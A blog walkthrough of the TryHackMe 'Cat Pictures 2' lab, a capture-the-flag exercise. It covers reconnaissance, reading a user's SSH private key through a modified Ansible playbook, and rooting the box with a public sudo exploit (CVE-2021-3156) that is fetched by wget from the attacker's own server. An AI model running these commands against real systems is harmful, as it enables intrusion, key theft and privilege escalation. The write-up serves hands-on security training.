Skip to main content

Featured

Edward Snowden: A Journey from NSA Whistleblower to Global Icon

  Edward Snowden is one of the most significant figures in modern history, known for his courageous act of whistleblowing that exposed widespread government surveillance programs. His actions ignited global debates on privacy, security, and government transparency. This blog will walk through his journey—from his early career, his decision to leak classified information, the aftermath, and his ongoing impact on privacy and cybersecurity. Early Life and Career Edward Joseph Snowden was born on June 21, 1983, in Elizabeth City, North Carolina. His early life wasn't extraordinary, but he exhibited a strong interest in computers from a young age. Snowden dropped out of high school but later obtained a General Educational Development (GED) certificate. His passion for computers led him to study at a community college before moving into the technology field, where he worked for companies like Dell and Booz Allen Hamilton. His early career involved working as a systems engineer, but he so...
Post a Comment
Read more

Cat Picture 2 walkthrough on tryhackme

 Cat Picture 2 Room on TryHackMe: A Fun and Educational Cybersecurity Challenge



The Cat Picture 2 room on TryHackMe is an engaging and playful cybersecurity challenge that combines the love for adorable cat pictures with the thrill of solving security puzzles. This room is designed to help both beginners and intermediate-level cybersecurity enthusiasts enhance their skills in a fun and interactive way.

Overview

In this challenge, users are tasked with discovering hidden information and vulnerabilities related to a fictional website that hosts cat pictures. The room is structured to guide participants through various stages, each requiring different cybersecurity techniques and tools to solve.

Learning Objectives

  1. Web Application Security: Participants will learn about common web vulnerabilities, such as SQL injection, cross-site scripting (XSS), and directory traversal.
  2. Steganography: One of the unique aspects of this room is the integration of steganography, where users must uncover hidden messages within images.
  3. Cryptography: Basic cryptographic principles are introduced, allowing users to practice decrypting encoded messages.
  4. Reconnaissance and Enumeration: Users will develop their skills in gathering information about the target website, identifying potential weak points.
  5. Scripting and Automation: The challenge encourages the use of scripting to automate tasks, improving efficiency in vulnerability detection and exploitation.

Why You Should Try It

The Cat Picture 2 room is perfect for those who enjoy hands-on learning and want to improve their cybersecurity knowledge in a relaxed and entertaining environment. The tasks are designed to be challenging yet rewarding, providing a sense of accomplishment as you progress through the stages. Whether you're a cat lover or simply looking for a unique way to sharpen your hacking skills, this room offers a purr-fect blend of fun and education.

Getting Started

To embark on this feline-themed adventure, sign up for a free account on TryHackMe and navigate to the Cat Picture 2 room. With step-by-step instructions and hints available, even newcomers to cybersecurity will find it accessible and enjoyable.

Lets start this room

1.) Deploy the machine


2.) Run the nmap scan 

Command - nmap -A -p- -T4 <ip>



3.) Examine the website



notice that timo volz image is 7.1 mb and other images are in kb

4.)Lets save the image and use exiftool to extract the title

Command - exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg


5.) Visit the text website
Congratulation you got the username and password

6.) visit port 3000 and sign in with the credential

7.) Lets find out first flag1.txt
click on the samarium

Click on the ansible
Congratulation you got the first flag1.txt

Lets start finding the flag2.txt
8.) click on playbook.yaml


It's look we can run whoami command on the port 1337



Congratulation we got the username bismuth let's extract ssh id_rsa
For that we need edit the command : cat .ssh/id_rsa

Lets execute this command 

Use chatgpt to remove " and ,

Connect to id_rsa with the username bismuth
command : ssh -i rd_rsa bismuth@<ip>


Congratulation we got the second flag2.txt

Now let's start founding the next flag3.txt
We need a exploit to escalate privilage of our shell sudo version 1.8.21p2



Now we know CVE-2021-3156
Lets check the github repository made by blasty

Download this github repository and then move the to victim machine by using this command: python3 -m http.server 8090


On the victim machine we need execute these command
wget http://<ip>:8090/Makefile
wget http://<ip>:8090/brute.sh
wget http://<ip>:8090/hax.c
wget http://<ip>:8090/lib.c

Enter this command on the victim machine 
Command: make

Command: ./sudo-hax-me-a-sandwich 0

then go to the root directory 
Congratulation you got the third flag3.txt
The End

Thanks for reading this walkthrough of Cat Pictures 2 on tryhackme 
Happy Hacking!

Comments

Post a Comment

Popular Posts